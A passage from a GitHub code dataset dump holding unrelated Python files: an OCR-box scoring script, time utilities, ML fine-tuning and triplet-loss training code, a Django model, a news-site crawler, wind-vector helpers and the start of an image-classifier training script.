help='the file to store final statistical results')\nparser.add_argument('--mar-text-mapping', type=str, default=None,\n help=\"If not none, map hypothesis mar with the transciptions.\"\n \"A hypothesis box is mapped with the transcription \"\n \"of reference box that had the largest IoU overlap.\"\n \"The variable will provide the path of the reference \" \n \"file containing mapping between mar and text\")\nparser.add_argument(\"--score-mar\", action=\"store_true\",\n help=\"If true, score after finding the minimum area rectangle\"\n \" derived from the object mask. If false, score based on\" \n \" object mask without further processing.\")\nargs = parser.parse_args()\n\ndef main():\n threshold_list = [0.50, 0.55, 0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95]\n if args.score_mar:\n ref_dict = read_rect_coordinates(args.reference)\n hyp_dict = read_rect_coordinates(args.hypothesis)\n else:\n ref_dict, hyp_dict = get_filenames_from_directory()\n\n mean_ap, mean_ar, stat_dict = get_mean_avg_scores(\n threshold_list, ref_dict, hyp_dict)\n\n write_stats_to_file(mean_ap, mean_ar, stat_dict)\n if args.mar_text_mapping:\n mapping_file = os.path.join(args.result, 'mar_transcription_mapping.txt')\n with open(mapping_file, 'w') as mapping_fh:\n ref_dict = read_rect_coordinates_and_transcription(args.mar_text_mapping)\n hyp_dict = read_rect_coordinates(args.hypothesis)\n for image_id in hyp_dict:\n ref_rect_transcription_lineid_list = list()\n for line_id in ref_dict[image_id]:\n ref_rect_transcription = ref_dict[image_id][line_id]\n ref_lineid_rect_transcription = ref_rect_transcription + (line_id,)\n ref_rect_transcription_lineid_list.append(ref_lineid_rect_transcription)\n for hyp_rect in hyp_dict[image_id]:\n ref_rect_transcription_lineid, best_index = get_mar_transcription_mapping(\n ref_rect_transcription_lineid_list, hyp_rect)\n line_id = ref_rect_transcription_lineid[2]\n transcription = ref_rect_transcription_lineid[1]\n hyp_mar = str()\n hyp_mar = str(int(hyp_rect[0]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[1]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[2]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[3]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[4]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[5]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[6]))\n hyp_mar = hyp_mar + ',' + str(int(hyp_rect[7]))\n mapping_fh.write(image_id + ' ' + line_id + ' ' + hyp_mar + ' ' + transcription + '\\n')\n\n\ndef get_mean_avg_scores(threshold_list, ref_dict, hyp_dict):\n \"\"\"\n Given the threshold list, it returns a tuple (mean_ap, mean_ar, stat_dict): \n mean average precision, mean average recall and statistic dictionary\n input\n -----\n If args.score_mar == true, then\n ref_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values\n hyp_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values.\n else\n ref_dict : dict(str): a dict of file basename and file path, for\n all files in the reference directory\n hyp_dict : dict(str): a dict of file basename and file path, for\n all files in the hypothesis directory\n\n threshold_list [float]: list of threshold values. 
MAP and MAR\n    are calculated for this threshold list.\n    return\n    -----\n    mean_ap (float): mean average precision over threshold list.\n             will satisfy 0 <= mean_ap <= 1\n    mean_ar (float): mean average recall over threshold list.\n             will satisfy 0 <= mean_ar <= 1\n    stat_dict dict(dict): contains precision and recall value for each\n              image for each threshold\n    \"\"\"\n    mean_ar = 0\n    mean_ap = 0\n    stat_dict = {}\n    for threshold in threshold_list:\n        mean_recall = 0\n        mean_precision = 0\n        img_count = 0\n        for image_id in ref_dict.keys():\n            img_count += 1\n            ref_data = ref_dict[image_id]\n            hyp_data = hyp_dict[image_id]\n            if not args.score_mar:\n                ref_data = np.load(ref_data)\n                hyp_data = np.load(hyp_data)\n            score = get_score(ref_data, hyp_data, threshold, args.score_mar)\n            precision = score['precision']\n            recall = score['recall']\n            mean_precision += precision\n            mean_recall += recall\n            precision_recall = str(precision) + \" \" + str(recall)\n            if image_id not in stat_dict.keys():\n                stat_dict[image_id] = dict()\n            stat_dict[image_id][threshold] = precision_recall\n        mean_precision /= img_count\n        mean_recall /= img_count\n        print(\"For threshold: {} Mean precision: {:0.3f} Mean recall: {:0.3f}\".format(\n            threshold, mean_precision, mean_recall))\n        mean_ap += mean_precision\n        mean_ar += mean_recall\n    mean_ap /= len(threshold_list)\n    mean_ar /= len(threshold_list)\n    print(\"Mean average precision: {} Mean average recall: {}\".\n          format(mean_ap, mean_ar))\n    return mean_ap, mean_ar, stat_dict\n\n\ndef write_stats_to_file(mean_ap, mean_ar, stat_dict):\n    \"\"\" Given mean average precision, mean average recall\n    and statistic dictionary, it writes image_id, threshold,\n    precision and recall value in args.result text file.\n    input\n    -----\n    mean_ap (float): mean average precision over threshold list.\n             will satisfy 0 <= mean_ap <= 1.\n    mean_ar (float): mean average recall over threshold list.\n             will satisfy 0 <= mean_ar <= 1\n    stat_dict dict(dict): contains precision and recall value for each\n              image for each threshold\n    \"\"\"\n    result_file = os.path.join(args.result, 'scoring_result.txt')\n    with open(result_file, 'w') as result_fh:\n        result_fh.write('Mean Average Precision: {}\\n'.format(mean_ap))\n        result_fh.write('Mean Average Recall: {}\\n'.format(mean_ar))\n        result_fh.write('ImageID Threshold Precision Recall\\n')\n        for image_id in stat_dict.keys():\n            for threshold in stat_dict[image_id].keys():\n                precision_recall = stat_dict[image_id][threshold]\n                result_fh.write('{} {} {}\\n'.format(image_id, threshold, precision_recall))\n    print('Saved to {}'.format(result_file))\n\n\ndef read_rect_coordinates(file_name):\n    \"\"\" Given the file name, it reads mask_id and rectangle\n    coordinates from the file. It finally returns an image_rect_dict.\n    A file should contain mask_id and the coordinates of the \n    minimum area rectangle that covers the mask with that mask id, \n    in the form of a counter-clockwise list of points.
A mar is \n described by 8 values (h1,w1,h2,w2,h3,w3,h4,w4), in the format:\n h1,w1,h2,w2,h3,w3,h4,w4\n for example:\n HYT_ARB_20070103.0066_4_LDC0061 25,179,15,178,16,70,26,71\n return\n ------\n image_rect_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values (h1,w1,h2,w2,h3,w3,h4,w4)\n \"\"\"\n image_rect_dict = dict()\n with open(file_name) as f:\n for line in f:\n line_vect = line.strip().split(' ')\n image_id = line_vect[0].split('$')[0]\n line_id = line_vect[0].split('$')[1]\n rect_coordinates = line_vect[1].split(',')\n if image_id not in image_rect_dict.keys():\n image_rect_dict[image_id] = list()\n image_rect_dict[image_id].append(rect_coordinates)\n return image_rect_dict\n\n\ndef read_rect_coordinates_and_transcription(file_name):\n \"\"\" Given the file name, it reads mask_id, rectangle\n coordinates and transcription from the file. It finally\n returns a image_rect_dict. A file should contain mask_id and\n the co-ordinates of the mar that covers the mask with that mask id,\n in the form of a counter-clockwise list of points. A mar is\n described by 8 values (h1,w1,h2,w2,h3,w3,h4,w4), in the format:\n h1,w1,h2,w2,h3,w3,h4,w4\n for example:\n HYT_ARB_20070103.0066_4_LDC0061 25,179,15,178,16,70,26,71\n return\n ------\n image_rect_dict : dict([[int]]): dict of a list of list, for\n each image_id it contains a list of rectangle and a rectangle\n is a list containing 8 integer values (h1,w1,h2,w2,h3,w3,h4,w4)\n \"\"\"\n image_rect_dict = dict()\n with open(file_name) as f:\n for line in f:\n line_vect = line.strip().split(' ')\n image_id = line_vect[0][:-5]\n line_id = line_vect[0]\n rect_coordinates = line_vect[1].split(',')\n transcription = \" \".join(line_vect[2:])\n if image_id not in image_rect_dict.keys():\n image_rect_dict[image_id] = dict()\n image_rect_dict[image_id][line_id] = (rect_coordinates, transcription)\n #image_rect_dict[image_id].append((rect_coordinates, transcription))\n return image_rect_dict\n\n\ndef get_filenames_from_directory():\n \"\"\" Given the hypothesis and reference directory name, it returns\n two dicts containing file name of each directory respectively. 
It\n    checks that both directories contain the same file names.\n    To do: add partial scoring option similar to kaldi.\n    return\n    ------\n    ref_file_dict : dict(str): a dict of file basename and file path, for\n        all files in the reference directory\n    hyp_file_dict : dict(str): a dict of file basename and file path, for\n        all files in the hypothesis directory\n    \"\"\"\n\n    ref_file_dict = dict()\n    hyp_file_dict = dict()\n    for img_ref_path, img_hyp_path in zip(glob(args.reference + \"/*.mask.npy\"),\n                                          glob(args.hypothesis + \"/*.mask.npy\")):\n\n        ref_id = os.path.basename(img_ref_path).split('.mask.npy')[0]\n        hyp_id = os.path.basename(img_hyp_path).split('.mask.npy')[0]\n        ref_file_dict[ref_id] = img_ref_path\n        hyp_file_dict[hyp_id] = img_hyp_path\n\n    assert len(ref_file_dict) == len(hyp_file_dict)\n\n    for file_id in ref_file_dict.keys():\n        if file_id not in hyp_file_dict.keys():\n            raise Exception(\"mask file (np array): {} missing in hypothesis directory\".format(file_id))\n\n    return ref_file_dict, hyp_file_dict\n\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"hhadian/waldo","sub_path":"egs/madcat_arabic/v1/scoring/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"3528131656","text":"# -*- coding: utf-8 -*-\n\"\"\" Time-related utilities \"\"\"\n\n# Time formats\nFORMAT_RFC3339 = \"%FT%T+0000\"\nFORMAT_RFC2822 = \"%a, %d %b %Y %T +0000\"\nFORMAT_RFC822 = \"%a, %d %b %y %T +0000\"\nFORMAT_RFC1123 = \"%a, %d %b %Y %H:%M:%S %Z\"\n\n\ndef unixtime(microsec = False):\n\t\"\"\" Get a Unix timestamp\n\n\t@param microsec: True to get the value in microseconds (floating point)\n\t@return: Unix timestamp\n\t\"\"\"\n\tfrom time import time\n\tt = time()\n\tif microsec:\n\t\treturn t\n\n\treturn int(t)\n\n\ndef format_unixtime(format = FORMAT_RFC2822, timestamp = None):\n\t\"\"\" Format a Unix timestamp\n\n\t@param format: format string; strftime() syntax or FORMAT_RFCxxx\n\t@param timestamp: Unix timestamp; defaults to the current time\n\t@return: the formatted time\n\t@requires: pytz\n\t\"\"\"\n\tfrom datetime import datetime\n\timport pytz\n\tif timestamp == None:\n\t\ttimestamp = unixtime()\n\n\treturn datetime.fromtimestamp(timestamp, tz = pytz.utc).strftime(format)\n\n\ndef _test():\n\t\"\"\" Test \"\"\"\n\tprint(format_unixtime())\n\tprint(format_unixtime(FORMAT_RFC822))\n\tprint(format_unixtime(FORMAT_RFC3339))\n\n\nif __name__ == \"__main__\":\n\t_test()\n","repo_name":"shimataro/brocadefw","sub_path":"brocadefw/utilities/timeutils.py","file_name":"timeutils.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"3102788927","text":"import os\r\nimport warnings\r\n\r\nimport hydra # need install hydra\r\nfrom omegaconf import DictConfig, OmegaConf # need install omegaconf\r\nimport mlflow\r\nfrom torch.utils.tensorboard import SummaryWriter\r\n\r\nimport utils\r\nfrom common import FineTuner\r\n\r\n\r\n@hydra.main(config_path='params', config_name='fine_tune')\r\ndef main(cfg: DictConfig):\r\n    if cfg.experiment_params.debug_mode:\r\n        warnings.warn('This training is DEBUG MODE')\r\n\r\n    # # # setting dir root\r\n    wd_root_dict = {}\r\n    wd_root_dict['current'] = hydra.utils.get_original_cwd() # current root\r\n    wd_root_dict['hydra'] = os.getcwd() # hydra save root\r\n    wd_root_dict['output'] = f'{wd_root_dict[\"current\"]}/{cfg.experiment_params.output_dir}' # mlflow save root\r\n    os.chdir(wd_root_dict['current'])\r\n\r\n    # # # mlflow logger setting\r\n    # load pretrain
mlflow logger\r\n pretrain_mlflow_logger = utils.MlflowLogger(experiment_name='train', wd_root_dict=wd_root_dict)\r\n pretrain_mlflow_logger.set_run_id_from_run_name(cfg.experiment_params.pretrain_run_name)\r\n\r\n # set experiment_id\r\n mlflow_logger = utils.MlflowLogger(experiment_name='fine_tune', wd_root_dict=wd_root_dict)\r\n mlflow_logger.create_run(cfg.experiment_params.run_name, cfg.experiment_params.debug_mode)\r\n mlflow_logger.log_tag(key=\"run_id\", value=mlflow_logger.run_id)\r\n print(f'Experiment [Name: {mlflow_logger.experiment_name}, Id: {mlflow_logger.experiment_id}]')\r\n print(f'Run [Name: {mlflow_logger.run_name}, Id: {mlflow_logger.run_id}]')\r\n # save params info to mlflow result\r\n mlflow_logger.log_params_from_omegaconf_dict(cfg, save_dir='fine_tune_hydra_config')\r\n\r\n # tensorboard logger setting\r\n tb_root = f'{wd_root_dict[\"output\"]}/tensorboard/{mlflow_logger.experiment_name}/{mlflow_logger.run_name}'\r\n tb_logger = SummaryWriter(tb_root)\r\n\r\n # get pretrain_config\r\n pretrain_hydra_config_root = f'{pretrain_mlflow_logger.get_artifact_root()}/train_hydra_config' # get trained network name\r\n pretrain_cfg = OmegaConf.load(f'{pretrain_hydra_config_root}/.hydra/config.yaml')\r\n\r\n # set seed (se pretrain seed)\r\n utils.seed_settings(pretrain_cfg.experiment_params.seed) # seedがNoneの場合,ランダムシード\r\n\r\n # set trainer and run\r\n trainer = FineTuner(cfg, mlflow_logger, pretrain_mlflow_logger, tb_logger)\r\n # # run\r\n trainer.run()\r\n tb_logger.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"rawss777/verify_self_supervised_learning","sub_path":"fine_tune.py","file_name":"fine_tune.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41593049447","text":"import os\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nimport torchvision\nfrom torchvision.models.resnet import resnet18, resnet34\n\n\nfrom pytorch_lightning import LightningDataModule, LightningModule\n\nfrom online_triplet_loss.losses import *\n\nfrom dataset import StanfordProductsOnlineDataset, Item\n\n\nclass StanfordProductsDataModule(LightningDataModule):\n def __init__(self, train_ann_file, dataset_dir, transforms=None, batch_size=8):\n super(StanfordProductsDataModule, self).__init__()\n\n items = []\n with open(train_ann_file, \"r\") as f:\n skip_header = True\n for line in f:\n if skip_header:\n skip_header = False\n continue\n\n img_idx, cls_idx, super_idx, name = line.split()\n items.append(Item(os.path.join(dataset_dir, name), int(cls_idx)))\n\n if transforms is None:\n transforms = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Resize((224, 224)),\n ])\n\n self.train = StanfordProductsOnlineDataset(items[:-3000], transforms)\n self.val = StanfordProductsOnlineDataset(items[-3000:], transforms)\n\n self.batch_size = batch_size\n\n def train_dataloader(self):\n return DataLoader(self.train, batch_size=self.batch_size, shuffle=True, num_workers=6)\n\n def val_dataloader(self):\n return DataLoader(self.val, batch_size=self.batch_size, shuffle=False, num_workers=6)\n\n def test_dataloader(self):\n return DataLoader(self.val, batch_size=self.batch_size, shuffle=False, num_workers=6)\n\n\nclass StanfordProductsModel(LightningModule):\n def __init__(self):\n super().__init__()\n\n self.lr = 1e-3\n\n model = resnet34(pretrained=True)\n model.fc = torch.nn.Identity()\n\n self.model = model\n 
self.criterion = batch_hard_triplet_loss\n\n def forward(self, z):\n return self.model(z)\n\n def training_step(self, batch, batch_idx):\n imgs, positive_images, labels = batch\n imgs = torch.cat((imgs, positive_images))\n labels = torch.cat((labels, labels))\n embeddings = self.model(imgs)\n\n loss = self.criterion(labels, embeddings, margin=0.2, device=self.device)\n self.log('loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n imgs, positive_images, labels = batch\n imgs = torch.cat((imgs, positive_images))\n labels = torch.cat((labels, labels))\n embeddings = self.model(imgs)\n\n loss = batch_hard_triplet_loss(labels, embeddings, margin=0.2, device=self.device, squared=True)\n self.log('val_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n\n return loss\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.lr)\n","repo_name":"Zebraside/sop","sub_path":"sop/lightning_modules.py","file_name":"lightning_modules.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11314360857","text":"from django.db import models\n\nfrom hw57.models.issuetype import IssueType\n\n\nclass Issue(models.Model):\n summary = models.CharField(\n max_length=100,\n null=False,\n blank=False,\n verbose_name='Краткое описание'\n )\n description = models.TextField(\n max_length=254,\n null=True,\n verbose_name='Полное описание'\n )\n status = models.ForeignKey(\n to='hw57.Status',\n on_delete=models.PROTECT\n )\n type = models.ManyToManyField(\n to='hw57.Type',\n related_name='issues',\n through=IssueType,\n through_fields=('issue', 'type'),\n blank=True\n )\n created_date = models.DateTimeField(\n verbose_name='Дата и время создания',\n auto_now_add=True\n )\n updated_date = models.DateTimeField(\n verbose_name='Дата и время обновления',\n auto_now=True\n )\n\n def __str__(self):\n return f'{self.summary}, {self.status}, {self.type}'\n\n class Meta:\n verbose_name = 'Задача'\n verbose_name_plural = 'Задачи'\n","repo_name":"nurlansapyzhan/homework_57_nurlan_sapyzhan","sub_path":"source/hw57/models/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29533451505","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport datetime\nimport QueueManager\nimport isVisited\nimport database\nfrom tqdm import tqdm\n\nstoplist = [\"javascript:void(0)\"]\nwebsite_list = [\"news.sohu.com\"]\nMAX_ITERATION = 10000\n\n\"\"\"\nclass Webpage(object):\n def __init__(self, link, title, date, content):\n self.link = link\n self.b_title = title\n self.date = date\n self.b_content = content\n\"\"\"\n\ndef space_to_dash(string):\n # print(string)\n new_string = []\n # string = string.split('')\n for char in string:\n if char == ' ':\n new_string.append('_')\n else:\n new_string.append(char)\n new_string = ''.join(new_string)\n return new_string\n\ndef Webpage(link, byte_title, date, byte_content):\n page = {}\n page['link'] = link\n page['byte_title'] = byte_title\n page['date'] = date\n page['byte_content'] = byte_content\n return page\n\n\ndef load_html(url):\n error_log = open(\"error.log\", 'a')\n try:\n response = urllib.request.urlopen(url)\n html = response.read()\n except:\n print(\"error opening: \" + url)\n 
error_log.write(url + '\\n')\n error_log.close()\n return None\n\n error_log.close()\n return html\n\n\n# this\"fil...add...\" function is under construction!\ndef filtered_addtolist(link, link_queue, link_visited):\n try:\n http_flag = (link[:4] == 'http')\n except:\n http_flag = False\n if link not in stoplist and \\\n link not in link_visited and \\\n http_flag:\n for website in website_list:\n if website in link:\n link_queue.put(link)\n # print (link)\n return\n\n\ndef parse_an_article(link_queue=QueueManager.list_init(),\n link_visited=isVisited.init()):\n target_url = link_queue.get()\n if target_url in link_visited or target_url in stoplist:\n return link_queue, link_visited\n # html = open('test.html', encoding='utf8').read()\n print(target_url)\n html = load_html(target_url)\n link_visited[target_url] = True\n\n try:\n soup = BeautifulSoup(html, 'html.parser')\n except:\n return link_queue, link_visited\n\n # get date\n date = None\n try:\n time_stamp = int(soup.find(id='news-time')['data-val'])/1000\n date = datetime.datetime.fromtimestamp(time_stamp)\n # time is scaled at seconds\n except:\n try:\n raw_date = soup.find(id='pubtime_baidu')['content']\n date = datetime.datetime.strptime(raw_date, \"%Y-%m-%dT%H:%M:%S+08:00\")\n except:\n try:\n raw_date = soup.find(id='pubtime_baidu').string\n date = datetime.datetime.strptime(raw_date, \"%Y-%m-%d %H:%M:%S\")\n except:\n pass\n\n byte_title = soup.title.string\n\n # now parsing the body part\n byte_content = \"\"\n try:\n article = soup.find('article')\n for string in article.strings:\n byte_content += string\n # byte_content = byte_content.encode('utf8')\n except:\n article = soup.find(itemprop='articleBody')\n try:\n descendants = article.descendants\n for tag in article.descendants:\n if tag.name == 'p':\n # byte_content += tag.string\n try:\n byte_content += tag.string\n except:\n try:\n byte_content += tag.br.string\n except:\n pass\n byte_content += '\\n'\n except:\n pass\n # parsing finished\n\n for raw_link in soup.find_all('a'):\n filtered_addtolist(raw_link.get('href'), link_queue, link_visited)\n\n page = Webpage(target_url, byte_title, date, byte_content)\n date_filename = space_to_dash(str(date))\n database.save(date_filename, byte_content)\n print(date_filename)\n return link_queue, link_visited\n\n\nif __name__ == '__main__':\n while True:\n link_queue = QueueManager.list_init()\n link_visited = isVisited.init()\n for iter_count in tqdm(range(MAX_ITERATION)):\n link_queue, link_visited\\\n = parse_an_article(link_queue, link_visited)\n print(\"now start saving\")\n QueueManager.list_save(link_queue)\n isVisited.save(link_visited)\n print(\"saving complete\")\n while True:\n user_input = input(\"continue?\\n(y/n)\")\n if user_input == 'y':\n break\n if user_input == 'n':\n exit(0)\n","repo_name":"mark14wu/ICT_spider","sub_path":"html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2976152241","text":"import math\nimport sys\nfrom datetime import datetime\nimport pytz\nimport numpy\n\ndef speed(uWind, vWind):\n \"\"\"Returns wind speed from orthogonal (u and v) wind components which can be scalars, lists, or numpy.arrays.\"\"\"\n\n speed = numpy.sqrt(numpy.power(numpy.array(uWind), 2.0) + numpy.power(numpy.array(vWind), 2.0))\n\n if speed.shape == (1, ):\n return speed[0]\n else:\n return speed\n\n\ndef u_flow(speed, direction):\n \"\"\"Returns the U-direction scalar (degrees, 
north-up).\"\"\"\n\n    # Convert to numpy arrays\n    speed = numpy.array(speed)\n    direction = numpy.array(direction)\n\n    # Check args\n    assert(numpy.all(speed >= 0))\n    assert(numpy.all(0 <= direction) and numpy.all(direction < 360))\n\n    u = numpy.sin(numpy.radians(direction))*speed\n\n    if u.shape == (1, ):\n        return u[0]\n    else:\n        return numpy.array(u)\n\n\ndef u_met(speed, direction):\n    \"\"\"Returns the speed in the U using the meteorological convention of FROM.\"\"\"\n\n    return -u_flow(speed, direction)\n\n\ndef v_flow(speed, direction):\n    \"\"\"Returns the V-direction scalar (degrees, north-up).\"\"\"\n\n    # Convert to numpy arrays\n    speed = numpy.array(speed)\n    direction = numpy.array(direction)\n\n    # Check args\n    assert(numpy.all(speed >= 0))\n    assert(numpy.all(0 <= direction) and numpy.all(direction < 360))\n\n    v = numpy.cos(numpy.radians(direction))*speed\n\n    if v.shape == (1, ):\n        return v[0]\n    else:\n        return numpy.array(v)\n\n\ndef v_met(speed, direction):\n    \"\"\"Returns the speed in the V using the meteorological convention of FROM.\"\"\"\n\n    return -v_flow(speed, direction)\n\n\ndef calc_dir_deg(u, v):\n    \"\"\"Calculates the direction from the orthogonal wind components.\n    *\n    * u U wind scalar velocity.\n    * v V wind scalar velocity.\n\n    * Returns the direction that a flow is going (i.e. not wind direction which is 180 degrees opposite).\n    \"\"\"\n\n    import math\n\n    # Calculate the direction in degrees\n    direction = math.degrees(math.atan2(u, v))\n\n    # Convert to a positive direction\n    if direction < 0:\n        direction += 360\n\n    return direction\n\ndef nanHelper(y):\n    \"\"\"Helper to handle indices and logical indices of NaNs.\n    From: http://stackoverflow.com/questions/6518811/interpolate-nan-values-in-a-numpy-array\n\n    Input:\n        - y, 1d numpy array with possible NaNs\n    Output:\n        - nans, logical indices of NaNs\n        - index, a function, with signature indices= index(logical_indices),\n          to convert logical indices of NaNs to 'equivalent' indices\n    Example:\n        >>> # linear interpolation of NaNs\n        >>> nans, x= nan_helper(y)\n        >>> y[nans]= numpy.array(np.interp(x(nans), x(~nans), y[~nans]),dtype=np.float32)\n    \"\"\"\n    import numpy as np\n\n    return np.isnan(y), lambda z: z.nonzero()[0]\n\ndef getDomainExtents(geogridFilename,paddingDegrees = 0.):\n    \"\"\"Finds the latitude and longitude domain extent from a geo_em.d0[X].nc .\n\n    geogridFilename - geo_em.d0[X].nc file name, can include directories\n    paddingDegrees - decimal degrees to pad the domain with, default 0\n\n    return minLong, maxLong, minLat, maxLat\n    \"\"\"\n\n    import scipy.io.netcdf as nc\n    import numpy as np\n\n\n    # Open the file\n    file = open(geogridFilename, 'r')\n    ncFile = nc.netcdf_file(file, 'r')\n\n    # Get the lat and long dimensions\n    xDim = ncFile.dimensions['west_east_stag']\n    yDim = ncFile.dimensions['south_north_stag']\n\n    # Get the long and lat variables, using the U and V respectively because they extend out of the domain the most\n    longVar = ncFile.variables['XLONG_U']\n    latVar = ncFile.variables['XLAT_V']\n\n    # Get the mins and maxes\n    minLong = np.min(longVar[0,:,0])\n    maxLong = np.max(longVar[0,:,xDim - 1])\n    minLat = np.min(latVar[0,0,:])\n    maxLat = np.max(latVar[0,yDim - 1, :])\n\n    # Close the file\n    ncFile.close()\n\n    return minLong - paddingDegrees, maxLong + paddingDegrees, minLat - paddingDegrees, maxLat + paddingDegrees\n\ndef get_deg_from_cardinal(cardinal):\n    \"\"\"Returns the direction in degrees for a 16-sector cardinal direction (e.g.
WSW, NE, etc...)\n \"\"\"\n\n dirdeg = {'N': 0,'NNE': 22.5, 'NE': 45.0, 'ENE': 67.5, 'E': 90.0, 'ESE': 112.5, 'SE': 135.0, 'SSE': 157.5,\n 'S': 180.0, 'SSW': 202.5, 'SW': 225.0, 'WSW': 247.5, 'W': 270.0, 'WNW': 292.5, 'NW': 315.0, 'NNW': 337.5}\n\n # Raises key error if not found\n try:\n return dirdeg[cardinal]\n except:\n raise\n\ndef get_cardinal_from_deg(dir):\n \"\"\"Returns a 16-sector cardinal direction (e.g. WSW, NE, etc...) for a direction in degrees\n \"\"\"\n\n if dir >= 337.5 and dir < 360 or dir < 22.5:\n return 'N';\n elif dir >= 22.5 and dir < 67.5:\n return 'NE'\n elif dir >= 67.5 and dir < 112.5:\n \t return 'E'\n elif dir >= 112.5 and dir < 157.5:\n return 'SE'\n elif dir >= 157.5 and dir < 202.5:\n \t return 'S'\n elif dir >= 202.5 and dir < 247.5:\n return 'SW'\n elif dir >= 247.5 and dir < 292.5:\n \t return 'W'\n elif dir >= 292.5 and dir < 337.5:\n return 'NW'\n else:\n return None\n\n\ndef none2NaN(x):\n \"\"\"Converts None objects in a 1D array to nan, for use in NumPy arrays. Returns an array.\n Found at: http://scienceoss.com/convert-none-to-nan-for-use-in-numpy-arrays/\"\"\"\n import numpy as np\n newlist = []\n for i in x:\n if i is not None:\n newlist.append(i)\n else:\n newlist.append(np.nan)\n return np.array(newlist)","repo_name":"wxmiked/windb2","sub_path":"windb2/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"9298929875","text":"# Imports here\nimport os, sys\nimport argparse\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\n# define command line inputs\nparser = argparse.ArgumentParser(description= 'Train.py')\nparser.add_argument('--data_dir', type= str, help='Enter data folder name (somefolder)' )\nparser.add_argument('--save_dir', type= str, help = 'Enter checkpoint name (something.pth)')\nparser.add_argument('--arch', dest= 'arch', type= str, default= 'vgg16', choices= ['densenet', 'alexnet', 'vgg'], help= 'choose model architecture')\nparser.add_argument('--drop_p', dest= 'drop_p', type=float, default= 0.5, help= 'drop percentage (0.5)')\nparser.add_argument('--gpu', dest= 'gpu', action= 'store_true', help= 'enable GPU')\nparser.add_argument('--epochs', dest= 'epochs', default= 3, type= int)\nparser.add_argument('--learning_rate', dest= 'learning_rate', type= float, default= 0.001, help= 'model learning rate')\nparser.add_argument('--hidden_units', dest= 'hidden_units', type= int, nargs= '+')\n\nargs = parser.parse_args()\n\ndef model_builder(arch):\n if 'vgg' in arch:\n model = models.vgg16(pretrained= True)\n elif 'alexnet' in arch:\n model = models.alexnet(pretrained= True)\n elif 'densenet' in arch:\n model = models.densenet161(pretrained= True)\n else:\n print('Model architecture unknown. 
Using vgg16...')\n model = models.vgg16(pretrained= True)\n\n for param in model.parameters():\n param.requires_grad = False\n return model\n\ndef print_model(arch, hidden_units, model):\n print('Model Architecture: ', arch.title())\n print('Hidden Layers: ', hidden_units)\n print('Model: \\n', model)\n\n\ndef validation(model, validloader, criterion):\n test_loss = 0\n accuracy = 0\n model.eval()\n model.to(device)\n\n for images, labels in validloader:\n images, labels = images.to(device), labels.to(device)\n\n output = model.forward(images)\n test_loss += criterion(output, labels).item()\n\n probs = torch.exp(output) # classifier output is LogSoftmax\n check = (labels.data == probs.max(dim= 1)[1])\n accuracy += check.type(torch.FloatTensor).mean()\n\n return test_loss, accuracy\n\n\ndef train_model(model, trainloader, validloader, criterion, optimizer, device, epochs=3):\n\n steps = 0\n running_loss = 0\n print_every = 40\n\n for e in range(epochs):\n model.classifier.train()\n model.to(device)\n\n for images, labels in trainloader:\n images, labels = images.to(device), labels.to(device)\n\n steps += 1\n optimizer.zero_grad()\n\n outputs = model.forward(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n if steps % print_every == 0:\n model.eval()\n\n with torch.no_grad():\n test_loss, accuracy = validation(model, validloader, criterion)\n\n print('Epoch: {}/{}...'.format(e+1, epochs),\n 'Training Loss: {:.3f} '.format(running_loss / print_every),\n 'Validation Loss: {:.3f} '.format(test_loss / len(validloader)),\n 'Validation Accuracy: {:.2f}%'.format(accuracy / len(validloader) * 100))\n\n running_loss = 0\n model.classifier.train()\n\n\nclass create_classifier (nn.Module):\n def __init__(self, input_size, output_size, hidden_layers, drop_p= 0.5):\n super().__init__()\n self.nn_hidden_layers = nn.ModuleList([nn.Linear(input_size, hidden_layers[0])])\n layer_sizes = zip(hidden_layers[:-1], hidden_layers[1:])\n self.nn_hidden_layers.extend([nn.Linear(h1, h2) for h1, h2 in layer_sizes])\n self.output = nn.Linear(hidden_layers[-1], output_size)\n self.dropout = 